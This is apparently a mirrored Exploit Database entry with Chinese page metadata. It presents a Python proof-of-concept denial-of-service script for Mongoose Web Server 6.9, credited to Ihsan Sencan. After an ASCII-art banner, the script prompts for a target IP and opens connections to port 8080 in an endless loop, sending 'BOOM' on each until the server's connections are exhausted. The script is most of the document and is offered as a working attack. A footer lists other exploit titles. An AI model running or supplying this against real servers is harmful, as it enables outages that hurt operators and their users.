Mongoose Web Server 6.9 – Denial of Service (PoC)

Exploit Database
17 阅读

作者： Ihsan Sencan

日期： 2018-11-12
类别：
- dos
平台：
- windows_x86-64
来源：https://www.exploit-db.com/exploits/45819/

# Exploit Title: Mongoose Web Server 6.9 - Denial of Service (PoC)
# Dork: N/A
# Date: 2018-11-11
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://cesanta.com/binary.html
# Software Link: https://backend.cesanta.com/cgi-bin/api.cgi?act=dl&os=win
# Version: 6.9
# Category: Dos
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)

#!/usr/bin/python
import socket

print """
 \\\|///
 \\- -//
(@ @ )
 ----oOOo--(_)-oOOo----
Mongoose Web Server 6.9
Ihsan Sencan
 ---------------Ooooo----
( )
 ooooO ) /
 ( )(_/
\ (
 \_)
"""
Ip = raw_input("[Ip]: ")
Port = 8080 # Default port
 
d=[]
c=0
while 1:
try:
d.append(socket.create_connection((Ip,Port)))
d[c].send("BOOM")
print "Sie!"
c+=1
except socket.error: 
print "Done!"
raw_input()
break

last Exploits
Mongoose Web Server 6.9 – Denial of Service (PoC)的更多信息

Internet Download Accelerator 5.8 – Remote Buffer Overflow (PoC)：
AzeoTech DaqFactory – Denial of Service：
Microsoft Internet Explorer 11 – ‘CMarkup::DestroySplayTree’ Use-After-Free：
SmartFTP Client 9.0.2615.0 – Denial of Service (PoC)：
Microsoft Windows Kernel – Out-of-Bounds Read in nt!MiRelocateImage While Parsing Malformed PE File：
TrouSerS – Denial of Service：
WebKit – ‘WebCore::Node::ensureRareData’ Use-After-Free：
Microsoft Windows PowerShell – Unsanitized Filename Command Execution：